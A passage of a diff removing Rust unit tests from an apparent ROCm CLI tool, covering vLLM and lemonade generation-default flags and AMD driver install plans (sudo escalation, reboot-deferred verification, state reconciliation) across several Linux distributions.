assert!(config.get("max_new_tokens").is_none()); - } - - #[test] - fn generation_defaults_merge_with_recipe_authored_config() { - // CLI values win, but authored keys the CLI does not set are preserved and - // exactly one `--override-generation-config` pair remains. - let authored = EngineRecipeHint { - contract_version: ENGINE_RECIPE_CONTRACT_VERSION.to_owned(), - engine: "vllm".to_owned(), - required_flags: vec![ - "--enable-auto-tool-choice".to_owned(), - "--override-generation-config".to_owned(), - "{\"temperature\":0.9,\"repetition_penalty\":1.1}".to_owned(), - ], - ..EngineRecipeHint::default() - }; - let hint = engine_recipe_with_generation_defaults( - "vllm", - Some(authored), - ServeGenerationDefaults { - temperature: Some(0.25), - top_p: Some(0.5), - max_tokens: None, - }, - ) - .expect("vllm defaults are supported") - .unwrap(); - assert_eq!( - hint.required_flags - .iter() - .filter(|flag| *flag == "--override-generation-config") - .count(), - 1 - ); - assert_eq!(hint.required_flags[0], "--enable-auto-tool-choice"); - let config: serde_json::Value = - serde_json::from_str(hint.required_flags.last().unwrap()).unwrap(); - assert_eq!(config["temperature"], 0.25); - assert_eq!(config["top_p"], 0.5); - assert_eq!(config["repetition_penalty"], 1.1); - } - - #[test] - fn generation_defaults_absent_or_non_vllm_pass_through() { - // No controls supplied: the hint flows through unchanged. - assert!( - engine_recipe_with_generation_defaults( - "vllm", - None, - ServeGenerationDefaults::default() - ) - .unwrap() - .is_none() - ); - assert!( - engine_recipe_with_generation_defaults( - "unknown", - None, - ServeGenerationDefaults { - temperature: Some(0.5), - top_p: Some(0.5), - max_tokens: Some(64), - }, - ) - .is_err() - ); - } - - #[test] - fn generation_defaults_translate_to_lemonade_llama_server_flags() { - let hint = engine_recipe_with_generation_defaults( - "lemonade", - None, - ServeGenerationDefaults { - temperature: Some(0.5), - top_p: Some(0.25), - max_tokens: Some(128), - }, - ) - .expect("lemonade defaults are supported") - .expect("defaults synthesize a recipe"); - assert_eq!( - hint.required_flags, - [ - "--temperature", - "0.5", - "--top-p", - "0.25", - "--n-predict", - "128" - ] + None, + false, ); - } - - #[test] - fn generation_defaults_preserve_unset_lemonade_recipe_flags() { - // Only --temperature is supplied via CLI; an authored --top-p already - // present in the recipe must survive untouched, mirroring the vLLM - // merge behavior instead of being deleted. - let authored = EngineRecipeHint { - contract_version: ENGINE_RECIPE_CONTRACT_VERSION.to_owned(), - engine: "lemonade".to_owned(), - required_flags: vec!["--top-p".to_owned(), "0.9".to_owned()], - ..EngineRecipeHint::default() - }; - let hint = engine_recipe_with_generation_defaults( - "lemonade", - Some(authored), - ServeGenerationDefaults { - temperature: Some(0.5), - top_p: None, - max_tokens: None, - }, - ) - .expect("lemonade defaults are supported") - .expect("supplied defaults should synthesize a hint"); - assert_eq!( - hint.required_flags, - ["--top-p", "0.9", "--temperature", "0.5"] + assert!( + !quiet + .iter() + .any(|entry| entry.contains("--gpu-memory-utilization")), + "nothing to report when the flag was honored: {quiet:?}" ); } @@ -32292,20 +28475,6 @@ install therock"; ); } - #[test] - fn engine_recipe_enables_tool_choice_reflects_flags() { - assert!(!engine_recipe_enables_tool_choice(None)); - let without = EngineRecipeHint { - contract_version: ENGINE_RECIPE_CONTRACT_VERSION.to_owned(), - engine: "vllm".to_owned(), - required_flags: vec!["--reasoning-parser".to_owned(), "qwen3".to_owned()], - ..EngineRecipeHint::default() - }; - assert!(!engine_recipe_enables_tool_choice(Some(&without))); - let with = engine_recipe_with_tool_call_override("vllm", None, Some("hermes")); - assert!(engine_recipe_enables_tool_choice(with.as_ref())); - } - #[test] fn parse_device_policy_defaults_to_gpu_required_without_cpu_fallback() -> Result<()> { assert_eq!(parse_device_policy(None)?, DevicePolicy::GpuRequired); @@ -32923,184 +29092,6 @@ install therock"; assert!(vram_capacity_is_meaningful(None, 1)); } - /// Every distro whose plan actually emits privileged commands, so the - /// escalation tests below sweep all of them rather than whichever one was - /// remembered. Adding a distro to the planner without adding it here would - /// leave its commands unswept. - fn dkms_planning_os_releases() -> Vec<(&'static str, &'static str)> { - vec![ - ( - "ubuntu", - "ID=ubuntu\nVERSION_ID=\"24.04\"\nVERSION_CODENAME=noble\n", - ), - ("debian", "ID=debian\nVERSION_ID=\"12\"\n"), - ("rhel", "ID=rhel\nVERSION_ID=\"9.7\"\n"), - ("rhel-8", "ID=rhel\nVERSION_ID=\"8.10\"\n"), - ("oracle", "ID=ol\nVERSION_ID=\"9.7\"\n"), - ("rocky", "ID=rocky\nVERSION_ID=\"9.4\"\n"), - ("sles", "ID=sles\nVERSION_ID=\"15.7\"\n"), - ( - "almalinux-via-id-like", - "ID=almalinux\nVERSION_ID=\"9.4\"\nID_LIKE=\"rhel centos fedora\"\n", - ), - ] - } - - fn plan_commands(os_release: &str, escalation: PrivilegeEscalation) -> Vec { - build_driver_install_plan(&test_examine("linux", false), os_release, true, escalation) - .commands - .into_iter() - .map(|command| command.command) - .collect() - } - - #[test] - fn driver_plan_as_root_never_emits_sudo() { - // The defect: every command was prefixed `sudo` unconditionally, so on a - // root host without the binary the first one died with `sudo: not found` - // before any driver work. This asserts the ABSENCE of `sudo` across every - // distro rather than checking known commands one by one — a templating - // site missed on some distro fails here instead of shipping. - for (label, os_release) in dkms_planning_os_releases() { - let commands = plan_commands(os_release, PrivilegeEscalation::AlreadyRoot); - assert!( - !commands.is_empty(), - "{label}: expected a dkms plan to emit commands" - ); - for command in &commands { - assert!( - !command.contains("sudo"), - "{label}: a plan built as root must not invoke sudo, got `{command}`" - ); - } - } - } - - #[test] - fn driver_plan_off_root_still_escalates_every_privileged_command() { - // The other half of the contract: dropping `sudo` when root must not drop - // it when a normal user runs the same plan. Verify-phase commands are - // read-only probes and are deliberately unprivileged, so only the - // mutating phases are required to escalate. - for (label, os_release) in dkms_planning_os_releases() { - let plan = build_driver_install_plan( - &test_examine("linux", false), - os_release, - true, - PrivilegeEscalation::Sudo, - ); - let privileged: Vec<&DriverPlanCommand> = plan - .commands - .iter() - .filter(|command| { - matches!( - command.phase, - DriverCommandPhase::Prepare | DriverCommandPhase::Execute - ) - }) - .collect(); - assert!(!privileged.is_empty(), "{label}: expected privileged steps"); - for command in privileged { - assert!( - command.command.contains("sudo "), - "{label}: a plan built off root must escalate, got `{}`", - command.command - ); - } - } - } - - #[test] - fn driver_plan_as_root_keeps_shell_pipelines_intact() { - // `sudo` also appears mid-pipeline (`| sudo tee`, `| sudo gpg`), which a - // naive "strip a leading prefix" fix would miss. The pipeline must survive - // with the escalation removed from the right-hand side only. - let ubuntu = "ID=ubuntu\nVERSION_ID=\"24.04\"\nVERSION_CODENAME=noble\n"; - let commands = plan_commands(ubuntu, PrivilegeEscalation::AlreadyRoot); - assert!( - commands - .iter() - .any(|command| command.contains("| tee /etc/apt/sources.list.d/amdgpu.list")), - "the apt-source pipeline must still tee, unprefixed: {commands:?}" - ); - assert!( - commands - .iter() - .any(|command| command.contains("| gpg --dearmor -o /etc/apt/keyrings/rocm.gpg")), - "the keyring pipeline must still call gpg, unprefixed: {commands:?}" - ); - } - - #[test] - fn driver_plan_records_the_commands_it_will_actually_run() { - // `execution_commands()` is what lands in state.json. It must agree with - // the escalation the plan was built under, or the recorded history - // describes commands that never ran. - let ubuntu = "ID=ubuntu\nVERSION_ID=\"24.04\"\nVERSION_CODENAME=noble\n"; - let as_root = build_driver_install_plan( - &test_examine("linux", false), - ubuntu, - true, - PrivilegeEscalation::AlreadyRoot, - ); - assert!( - as_root - .execution_commands() - .iter() - .all(|command| !command.contains("sudo")), - "state.json must not record sudo commands for a root run" - ); - let off_root = build_driver_install_plan( - &test_examine("linux", false), - ubuntu, - true, - PrivilegeEscalation::Sudo, - ); - assert!( - off_root - .execution_commands() - .iter() - .all(|command| command.contains("sudo ")), - "state.json must record the sudo commands a non-root run performs" - ); - } - - #[test] - fn driver_plan_as_root_drops_the_sudo_binary_precondition() { - // The preflight claimed `sudo` must be installed even when the plan no - // longer uses it — the same contradiction the bug report called out - // between the stated preconditions and what execution actually did. - for (label, os_release) in dkms_planning_os_releases() { - let as_root = build_driver_install_plan( - &test_examine("linux", false), - os_release, - true, - PrivilegeEscalation::AlreadyRoot, - ); - assert!( - !as_root - .preflight_checks - .iter() - .any(|check| check.contains("`sudo` command is available")), - "{label}: a root plan must not require a sudo binary: {:?}", - as_root.preflight_checks - ); - let off_root = build_driver_install_plan( - &test_examine("linux", false), - os_release, - true, - PrivilegeEscalation::Sudo, - ); - assert!( - off_root - .preflight_checks - .iter() - .any(|check| check.contains("`sudo` command is available")), - "{label}: a non-root plan still depends on a sudo binary" - ); - } - } - /// The `ROCM_E2E_FORCE_LOW_VRAM` hook must synthesize a reading that actually /// trips the serve-plan low-VRAM warning on a non-APU (vLLM-lane) host, and /// stay inert when the var is unset. This is what the `@requires-gpu` @@ -33139,1480 +29130,6 @@ install therock"; assert!(warning.contains("GPU 0")); } - #[test] - fn driver_plan_ubuntu_2404_uses_official_dkms_commands() { - let _env = ScopedTestEnv::with_amd_overrides_cleared(); - let os_release = r#" -ID=ubuntu -VERSION_ID="24.04" -VERSION_CODENAME=noble -"#; - let plan = build_driver_install_plan( - &test_examine("linux", false), - os_release, - true, - PrivilegeEscalation::Sudo, - ); - let commands = plan - .commands - .iter() - .map(|command| command.command.as_str()) - .collect::>(); - - assert!(plan.supported); - assert!(plan.mutating); - assert_eq!(plan.policy, "linux_official_amd_dkms_wrapper"); - assert!( - plan.preflight_checks - .iter() - .any(|check| check.contains("sudo -v")) - ); - assert!( - commands - .iter() - .any(|command| command.contains("linux-headers-$(uname -r)")) - ); - assert!( - commands - .iter() - .any(|command| command.contains("linux-modules-extra-$(uname -r)")) - ); - assert!( - commands - .iter() - .any(|command| command.contains("repo.radeon.com/graphics")) - ); - assert!( - commands - .iter() - .any(|command| command.contains("amdgpu-dkms")) - ); - let rendered = render_driver_install_plan(&plan, false, false); - assert!(rendered.contains("approval: required")); - assert!(rendered.contains("preflight_checks:")); - assert!(rendered.contains("root access: run as root, or ensure `sudo -v` succeeds")); - assert!(rendered.contains("execution_commands:")); - assert!(rendered.contains("Prepare: sudo apt-get update")); - assert!(rendered.contains("Execute: sudo apt-get install -y amdgpu-dkms")); - assert!(rendered.contains("post_reboot_check_commands:")); - assert!(rendered.contains("dkms status amdgpu")); - assert!(rendered.contains("rerun with --yes")); - } - - #[test] - fn driver_plan_executor_runs_verify_after_execute() -> Result<()> { - let mut plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); - plan.commands = vec![ - driver_command(DriverCommandPhase::Prepare, "prepare"), - driver_command(DriverCommandPhase::Execute, "execute"), - driver_command(DriverCommandPhase::Verify, "verify"), - ]; - let mut state = DriverInstallState { - approved_at_unix_ms: 1, - executed_at_unix_ms: None, - pre_driver: test_examine("linux", true).driver, - post_driver: None, - boot_id_at_execution: Some("boot".to_owned()), - reboot_required: plan.reboot_required, - reboot_observed: false, - commands: plan.execution_commands(), - reconciled_at_unix_ms: None, - reconciliation: None, - }; - let mut observed = Vec::new(); - - execute_driver_install_plan( - &plan, - &mut state, - |command| { - observed.push(command.to_owned()); - Ok(()) - }, - |_| Ok(()), - || Ok(test_examine("linux", true).driver), - )?; - - assert_eq!(observed, ["prepare", "execute", "verify"]); - assert!(state.executed_at_unix_ms.is_some()); - Ok(()) - } - - #[test] - fn driver_plan_executor_defers_verify_when_reboot_is_required() -> Result<()> { - let plan = build_driver_install_plan( - &test_examine("linux", false), - "ID=ubuntu\nVERSION_ID=\"24.04\"\nVERSION_CODENAME=noble\n", - true, - PrivilegeEscalation::Sudo, - ); - assert!(plan.reboot_required); - let expected = plan.execution_commands(); - let verify_commands = plan - .commands - .iter() - .filter(|command| command.phase == DriverCommandPhase::Verify) - .map(|command| command.command.clone()) - .collect::>(); - let mut state = DriverInstallState { - approved_at_unix_ms: 1, - executed_at_unix_ms: None, - pre_driver: test_examine("linux", false).driver, - post_driver: None, - boot_id_at_execution: Some("boot".to_owned()), - reboot_required: plan.reboot_required, - reboot_observed: false, - commands: plan.execution_commands(), - reconciled_at_unix_ms: None, - reconciliation: None, - }; - let mut observed = Vec::new(); - - execute_driver_install_plan( - &plan, - &mut state, - |command| { - observed.push(command.to_owned()); - Ok(()) - }, - |_| Ok(()), - || Ok(test_examine("linux", false).driver), - )?; - - assert_eq!(observed, expected); - assert!( - verify_commands - .iter() - .all(|command| !observed.contains(command)), - "reboot-gated Verify commands must be deferred: {verify_commands:?}" - ); - assert!(state.executed_at_unix_ms.is_some()); - assert!(state.reboot_required); - Ok(()) - } - - #[test] - fn failed_driver_verify_does_not_mark_execution_completed() -> Result<()> { - let (root, paths) = test_paths("driver-verify-failure-state"); - let mut plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); - plan.commands = vec![ - driver_command(DriverCommandPhase::Prepare, "prepare"), - driver_command(DriverCommandPhase::Execute, "execute"), - driver_command(DriverCommandPhase::Verify, "verify"), - ]; - let mut state = DriverInstallState { - approved_at_unix_ms: 1, - executed_at_unix_ms: None, - pre_driver: test_examine("linux", true).driver, - post_driver: None, - boot_id_at_execution: Some("boot".to_owned()), - reboot_required: plan.reboot_required, - reboot_observed: false, - commands: plan.execution_commands(), - reconciled_at_unix_ms: None, - reconciliation: None, - }; - write_driver_install_state(&paths, &state)?; - let mut observed = Vec::new(); - let mut gathered = false; - - let error = execute_driver_install_plan( - &plan, - &mut state, - |command| { - observed.push(command.to_owned()); - if command == "verify" { - bail!("verification rejected the install"); - } - Ok(()) - }, - |state| write_driver_install_state(&paths, state), - || { - gathered = true; - Ok(test_examine("linux", true).driver) - }, - ) - .expect_err("failed verification must fail the install"); - let saved = read_driver_install_state(&paths)?.expect("state should remain readable"); - - assert_eq!(observed, ["prepare", "execute", "verify"]); - assert!(error.to_string().contains("driver command failed: verify")); - assert!( - !gathered, - "post-install state must not be gathered after failure" - ); - assert_eq!(state.executed_at_unix_ms, None); - assert!(state.post_driver.is_none()); - assert_eq!(saved.executed_at_unix_ms, None); - assert!(saved.post_driver.is_none()); - let _ = fs::remove_dir_all(root); - Ok(()) - } - - #[test] - fn failed_post_driver_gather_keeps_executed_state_persisted() -> Result<()> { - let (root, paths) = test_paths("driver-gather-failure-state"); - let mut plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); - plan.commands = vec![ - driver_command(DriverCommandPhase::Prepare, "prepare"), - driver_command(DriverCommandPhase::Execute, "execute"), - driver_command(DriverCommandPhase::Verify, "verify"), - ]; - let mut state = DriverInstallState { - approved_at_unix_ms: 1, - executed_at_unix_ms: None, - pre_driver: test_examine("linux", true).driver, - post_driver: None, - boot_id_at_execution: Some("boot".to_owned()), - reboot_required: plan.reboot_required, - reboot_observed: false, - commands: plan.execution_commands(), - reconciled_at_unix_ms: None, - reconciliation: None, - }; - write_driver_install_state(&paths, &state)?; - - let error = execute_driver_install_plan( - &plan, - &mut state, - |_| Ok(()), - |state| write_driver_install_state(&paths, state), - || bail!("post-driver gather failed"), - ) - .expect_err("a post-driver gather failure must still fail the install"); - let saved = read_driver_install_state(&paths)?.expect("state should remain readable"); - - assert!(error.to_string().contains("post-driver gather failed")); - assert!(saved.executed_at_unix_ms.is_some()); - assert!(saved.post_driver.is_none()); - let _ = fs::remove_dir_all(root); - Ok(()) - } - - #[test] - fn driver_reconcile_without_state_gives_non_privileged_guidance() -> Result<()> { - let (root, paths) = test_paths("driver-reconcile-empty"); - - let rendered = reconcile_driver_install(&paths)?; - - assert!(rendered.contains("driver install reconciliation")); - assert!(rendered.contains("approval: not required")); - assert!(rendered.contains("privileged_commands: ")); - assert!(rendered.contains("no prior driver execution state found")); - assert!(rendered.contains("rocm install driver --dkms")); - assert!(!driver_install_state_path(&paths).exists()); - let _ = fs::remove_dir_all(root); - Ok(()) - } - - #[test] - fn driver_reconcile_updates_state_after_reboot() -> Result<()> { - let (root, paths) = test_paths("driver-reconcile-state"); - let pre_driver = rocm_core::DriverSummary { - policy: "linux_official_amd_dkms_wrapper".to_owned(), - status: "not_detected".to_owned(), - detail: None, - }; - let current_driver = rocm_core::DriverSummary { - policy: "linux_official_amd_dkms_wrapper".to_owned(), - status: "amdgpu_available".to_owned(), - detail: Some("/dev/kfd is present".to_owned()), - }; - let mut state = DriverInstallState { - approved_at_unix_ms: 1, - executed_at_unix_ms: Some(2), - pre_driver, - post_driver: None, - boot_id_at_execution: Some("old-boot".to_owned()), - reboot_required: true, - reboot_observed: false, - commands: vec!["sudo apt-get install -y amdgpu-dkms".to_owned()], - reconciled_at_unix_ms: None, - reconciliation: None, - }; - let checks = vec![ - DriverPassiveCheck { - name: "/dev/kfd".to_owned(), - status: "present".to_owned(), - detail: "KFD device node".to_owned(), - }, - DriverPassiveCheck { - name: "/dev/dri/renderD*".to_owned(), - status: "missing".to_owned(), - detail: "DRM render node".to_owned(), - }, - ]; - - let rendered = reconcile_driver_install_state( - &paths, - &mut state, - current_driver, - Some("new-boot".to_owned()), - checks, - )?; - let saved = read_driver_install_state(&paths)?.expect("state should be saved"); - - assert!(rendered.contains("reboot_observed: true")); - assert!(rendered.contains("approval: not required")); - assert!(rendered.contains("privileged_commands: ")); - assert!(rendered.contains("driver_status: amdgpu_available")); - assert!(rendered.contains("passive_check_summary: total=2 present=1 missing=1")); - assert!(rendered.contains("/dev/dri/renderD*: missing")); - assert!(rendered.contains("missing passive checks")); - assert!(saved.reboot_observed); - assert!(saved.reconciled_at_unix_ms.is_some()); - assert_eq!( - saved - .reconciliation - .as_ref() - .map(|value| value.driver.status.as_str()), - Some("amdgpu_available") - ); - let reconciliation = saved.reconciliation.as_ref().expect("reconciliation saved"); - assert_eq!(reconciliation.check_summary.total, 2); - assert_eq!(reconciliation.check_summary.present, 1); - assert_eq!(reconciliation.check_summary.missing, 1); - let _ = fs::remove_dir_all(root); - Ok(()) - } - - #[test] - fn driver_reconcile_preserves_explicit_reboot_policy() -> Result<()> { - for reboot_required in [false, true] { - let (root, paths) = test_paths(if reboot_required { - "driver-reconcile-reboot-true" - } else { - "driver-reconcile-reboot-false" - }); - let driver = rocm_core::DriverSummary { - policy: "driver-policy".to_owned(), - status: "available".to_owned(), - detail: None, - }; - let mut state = DriverInstallState { - approved_at_unix_ms: 1, - executed_at_unix_ms: Some(2), - pre_driver: driver.clone(), - post_driver: None, - boot_id_at_execution: Some("same-boot".to_owned()), - reboot_required, - reboot_observed: false, - commands: vec!["execute".to_owned()], - reconciled_at_unix_ms: None, - reconciliation: None, - }; - - reconcile_driver_install_state( - &paths, - &mut state, - driver, - Some("same-boot".to_owned()), - Vec::new(), - )?; - let saved = read_driver_install_state(&paths)?.expect("state should be saved"); - - assert_eq!(state.reboot_required, reboot_required); - assert_eq!(saved.reboot_required, reboot_required); - let _ = fs::remove_dir_all(root); - } - Ok(()) - } - - #[test] - fn driver_passive_check_summary_counts_non_present_as_missing() { - let summary = summarize_driver_passive_checks(&[ - DriverPassiveCheck { - name: "/dev/kfd".to_owned(), - status: "present".to_owned(), - detail: "KFD".to_owned(), - }, - DriverPassiveCheck { - name: "/dev/dri/renderD*".to_owned(), - status: "missing".to_owned(), - detail: "render".to_owned(), - }, - DriverPassiveCheck { - name: "dkms".to_owned(), - status: "error".to_owned(), - detail: "dkms status failed".to_owned(), - }, - ]); - - assert_eq!(summary.total, 3); - assert_eq!(summary.present, 1); - assert_eq!(summary.missing, 2); - } - - #[test] - fn driver_plan_default_linux_preflight_has_no_execution_commands() { - let _env = ScopedTestEnv::with_amd_overrides_cleared(); - let os_release = r#" -ID=ubuntu -VERSION_ID="24.04" -VERSION_CODENAME=noble -"#; - let plan = build_driver_install_plan( - &test_examine("linux", false), - os_release, - false, - PrivilegeEscalation::Sudo, - ); - let rendered = render_driver_install_plan(&plan, false, false); - - assert!(plan.supported); - assert!(!plan.mutating); - assert!(plan.commands.is_empty()); - assert!(rendered.contains("approval: not required")); - assert!(rendered.contains("execution_commands: ")); - assert!(!rendered.contains("sudo apt-get")); - assert!(rendered.contains("add --dkms")); - } - - #[test] - fn resolve_shell_default_template_uses_default_when_env_unset() { - let _env = ScopedTestEnv::new(); - // A made-up variable name that nothing else sets, cleared under the lock, - // isolates the default path. - assert_eq!( - resolve_shell_default_template("${ROCM_CLI_TEST_UNSET_REPO_VERSION:-7.2.4}"), - "7.2.4" - ); - } - - #[test] - fn resolve_shell_default_template_prefers_env_value_when_set() { - let mut env = ScopedTestEnv::new(); - let var = "ROCM_CLI_TEST_REPO_VERSION_OVERRIDE"; - env.set(var, "9.9.9"); - assert_eq!( - resolve_shell_default_template(&format!("${{{var}:-7.2.4}}")), - "9.9.9" - ); - } - - #[test] - fn resolve_shell_default_template_treats_empty_env_as_unset() { - let mut env = ScopedTestEnv::new(); - let var = "ROCM_CLI_TEST_REPO_VERSION_EMPTY"; - env.set(var, ""); - assert_eq!( - resolve_shell_default_template(&format!("${{{var}:-7.2.4}}")), - "7.2.4" - ); - } - - #[test] - fn resolve_shell_default_template_passes_through_non_template() { - assert_eq!(resolve_shell_default_template("7.2.4"), "7.2.4"); - } - - #[test] - fn resolve_shell_default_template_leaves_bare_var_untouched() { - let _env = ScopedTestEnv::new(); - // No `:-default`, so there is nothing to resolve to; the input must pass - // through unchanged rather than being partially rewritten. - assert_eq!( - resolve_shell_default_template("${ROCM_CLI_TEST_UNSET_REPO_VERSION}"), - "${ROCM_CLI_TEST_UNSET_REPO_VERSION}" - ); - } - - #[test] - fn resolve_shell_default_template_leaves_nested_default_untouched() { - let _env = ScopedTestEnv::new(); - // A nested default is beyond the flat matcher; returning the literal - // input keeps a `${B:-x}` fragment from leaking as a "resolved" value. - assert_eq!( - resolve_shell_default_template("${ROCM_CLI_TEST_UNSET_A:-${ROCM_CLI_TEST_UNSET_B:-x}}"), - "${ROCM_CLI_TEST_UNSET_A:-${ROCM_CLI_TEST_UNSET_B:-x}}" - ); - } - - #[test] - fn driver_plan_dry_run_repo_version_line_is_resolved() { - let _env = ScopedTestEnv::with_amd_overrides_cleared(); - // Regression for the dry-run output leaking the raw shell placeholder on - // the `repo_version:` line instead of the effective version. - let os_release = r#" -ID=rhel -VERSION_ID="9.7" -"#; - let plan = build_driver_install_plan( - &test_examine("linux", false), - os_release, - true, - PrivilegeEscalation::Sudo, - ); - let rendered = render_driver_install_plan(&plan, false, true); - - assert!(rendered.contains("repo_version: 7.2.4")); - assert!(!rendered.contains("repo_version: ${ROCM_CLI_AMDGPU_VERSION:-7.2.4}")); - } - - #[test] - fn driver_plan_debian_12_omits_linux_modules_extra() { - let _env = ScopedTestEnv::with_amd_overrides_cleared(); - let os_release = r#" -ID=debian -VERSION_ID="12" -VERSION_CODENAME=bookworm -"#; - let plan = build_driver_install_plan( - &test_examine("linux", false), - os_release, - true, - PrivilegeEscalation::Sudo, - ); - let rendered = render_driver_install_plan(&plan, false, true); - - assert!(plan.supported); - assert!(rendered.contains("approval: not required")); - assert!(rendered.contains("linux-headers-$(uname -r)")); - assert!(!rendered.contains("linux-modules-extra-$(uname -r)")); - assert!(rendered.contains("amdgpu-dkms")); - assert!(rendered.contains("dry run only")); - } - - #[test] - fn driver_plan_rhel_97_uses_documented_dnf_commands() { - let _env = ScopedTestEnv::with_amd_overrides_cleared(); - let os_release = r#" -ID=rhel -VERSION_ID="9.7" -"#; - let plan = build_driver_install_plan( - &test_examine("linux", false), - os_release, - true, - PrivilegeEscalation::Sudo, - ); - let rendered = render_driver_install_plan(&plan, false, false); - - assert!(plan.supported); - assert!(plan.mutating); - assert_eq!(plan.policy, "linux_official_amd_dkms_wrapper"); - assert!(rendered.contains("`dnf` package manager is available")); - assert!(rendered.contains("kernel-headers-$(uname -r)")); - assert!(rendered.contains("kernel-devel-$(uname -r)")); - assert!(rendered.contains("kernel-devel-matched-$(uname -r)")); - assert!(rendered.contains("repo.radeon.com/amdgpu-install/7.2.4/rhel/9.7/")); - assert!(rendered.contains("amdgpu-install-7.2.4.70204-1.el9.noarch.rpm")); - assert!(rendered.contains("Execute: sudo dnf install -y amdgpu-dkms")); - assert!(rendered.contains("approval: required")); - } - - #[test] - fn driver_plan_oracle_linux_101_uses_el_10_uek_flow() { - let _env = ScopedTestEnv::with_amd_overrides_cleared(); - let os_release = r#" -ID=ol -VERSION_ID="10.1" -"#; - let plan = build_driver_install_plan( - &test_examine("linux", false), - os_release, - true, - PrivilegeEscalation::Sudo, - ); - let rendered = render_driver_install_plan(&plan, false, true); - - assert!(plan.supported); - assert!(rendered.contains("approval: not required")); - assert!(rendered.contains("kernel-uek-devel-$(uname -r)")); - assert!(rendered.contains("repo.radeon.com/amdgpu-install/7.2.4/el/10/")); - assert!(rendered.contains("amdgpu-install-7.2.4.70204-1.el10.noarch.rpm")); - assert!(rendered.contains("dry run only")); - } - - #[test] - fn driver_plan_rocky_97_uses_el_dnf_flow() { - let _env = ScopedTestEnv::with_amd_overrides_cleared(); - let os_release = r#" -ID=rocky -VERSION_ID="9.7" -"#; - let plan = build_driver_install_plan( - &test_examine("linux", false), - os_release, - true, - PrivilegeEscalation::Sudo, - ); - let rendered = render_driver_install_plan(&plan, false, false); - - assert!(plan.supported); - assert!( - rendered - .contains("sudo dnf install -y kernel-headers kernel-devel kernel-devel-matched") - ); - assert!(rendered.contains("repo.radeon.com/amdgpu-install/7.2.4/el/9.7/")); - assert!(rendered.contains("Execute: sudo dnf install -y amdgpu-dkms")); - } - - #[test] - fn driver_plan_rocky_94_uses_el_dnf_flow() { - let _env = ScopedTestEnv::with_amd_overrides_cleared(); - // Rocky 9.x point releases must resolve like RHEL 9.x, not just 9.7. - let os_release = r#" -ID=rocky -VERSION_ID="9.4" -"#; - let plan = build_driver_install_plan( - &test_examine("linux", false), - os_release, - true, - PrivilegeEscalation::Sudo, - ); - let rendered = render_driver_install_plan(&plan, false, false); - - assert!(plan.supported); - assert!(plan.mutating); - assert!(rendered.contains("repo.radeon.com/amdgpu-install/7.2.4/el/9.4/")); - assert!(rendered.contains("amdgpu-install-7.2.4.70204-1.el9.noarch.rpm")); - assert!(rendered.contains("Execute: sudo dnf install -y amdgpu-dkms")); - } - - #[test] - fn driver_plan_rocky_8_and_10_remain_unsupported() { - let _env = ScopedTestEnv::with_amd_overrides_cleared(); - // AMD documents Rocky Linux 9 only; keep the driver matrix scoped to 9.x. - for version in ["8.10", "10.0"] { - let os_release = format!("\nID=rocky\nVERSION_ID=\"{version}\"\n"); - let plan = build_driver_install_plan( - &test_examine("linux", false), - &os_release, - true, - PrivilegeEscalation::Sudo, - ); - assert!(!plan.supported, "rocky {version} should be unsupported"); - assert!(!plan.mutating, "rocky {version} must not mutate"); - assert!( - plan.commands.is_empty(), - "rocky {version} must emit no commands" - ); - } - } - - #[test] - fn driver_plan_debian_uses_intended_ubuntu_suite() { - let _env = ScopedTestEnv::with_amd_overrides_cleared(); - // AMD's documented Debian install deliberately serves Debian from the - // Ubuntu-suite graphics tree (Debian 12 -> jammy). Lock that in and - // ensure the plan explains the mapping is intentional. - let os_release = r#" -ID=debian -VERSION_ID="12" -VERSION_CODENAME=bookworm -"#; - let plan = build_driver_install_plan( - &test_examine("linux", false), - os_release, - true, - PrivilegeEscalation::Sudo, - ); - let rendered = render_driver_install_plan(&plan, false, true); - - assert!(plan.supported); - assert_eq!(plan.codename, "jammy"); - assert!(rendered.contains("https://repo.radeon.com/graphics/7.2.4/ubuntu jammy main")); - assert!( - plan.reason - .contains("intentionally uses AMD's Ubuntu-suite repository") - ); - } - - #[test] - fn driver_plan_sles_157_uses_documented_zypper_commands() { - let _env = ScopedTestEnv::with_amd_overrides_cleared(); - let os_release = r#" -ID=sles -VERSION_ID="15.7" -"#; - let plan = build_driver_install_plan( - &test_examine("linux", false), - os_release, - true, - PrivilegeEscalation::Sudo, - ); - let rendered = render_driver_install_plan(&plan, false, false); - - assert!(plan.supported); - assert!(rendered.contains("`zypper` package manager is available")); - assert!(rendered.contains("SUSEConnect")); - assert!(rendered.contains("sle-module-desktop-applications/15.7/x86_64")); - assert!(rendered.contains("sudo zypper install -y kernel-default-devel")); - assert!(rendered.contains("repo.radeon.com/amdgpu-install/7.2.4/sle/15.7/")); - assert!(rendered.contains("sudo zypper --no-gpg-checks install -y")); - assert!(rendered.contains("Execute: sudo zypper install -y amdgpu-dkms")); - assert!(rendered.contains("approval: required")); - } - - #[test] - fn driver_plan_unsupported_linux_is_non_mutating() { - let _env = ScopedTestEnv::with_amd_overrides_cleared(); - let os_release = r#" -ID=fedora -VERSION_ID="41" -"#; - let plan = build_driver_install_plan( - &test_examine("linux", false), - os_release, - true, - PrivilegeEscalation::Sudo, - ); - let rendered = render_driver_install_plan(&plan, false, false); - - assert!(!plan.supported); - assert!(!plan.mutating); - assert!(rendered.contains("unsupported_linux_dkms_plan")); - assert!(rendered.contains("approval: not required")); - assert!(rendered.contains("no driver commands will be executed")); - assert!(!rendered.contains("sudo dnf install -y amdgpu-dkms")); - } - - #[test] - fn windows_install_driver_is_validate_only() { - let _env = ScopedTestEnv::with_amd_overrides_cleared(); - let plan = build_driver_install_plan( - &test_examine("windows", false), - "", - true, - PrivilegeEscalation::Sudo, - ); - let rendered = render_driver_install_plan(&plan, false, true); - - assert!(!plan.supported); - assert!(!plan.mutating); - assert_eq!(plan.policy, "windows_validate_only"); - assert!(rendered.contains("approval: not required")); - assert!(rendered.contains("execution_commands: ")); - assert!(rendered.contains("post_reboot_checks:")); - assert!(rendered.contains("use `rocm examine`")); - assert!(rendered.contains("rocm examine")); - assert!(plan.commands.is_empty()); - } - - #[test] - fn wsl_install_driver_installs_rocdxg_without_dkms() { - // `dkms: true` is passed deliberately: WSL2 has no kernel module to - // build, so the flag must not pull in the bare-metal path. - // - // `build_driver_install_plan` resolves `${ROCM_CLI_AMDGPU_VERSION:-...}` - // from process env before it reaches the WSL branch, and the WSL branch - // then reads the three ROCDXG vars — an exported - // 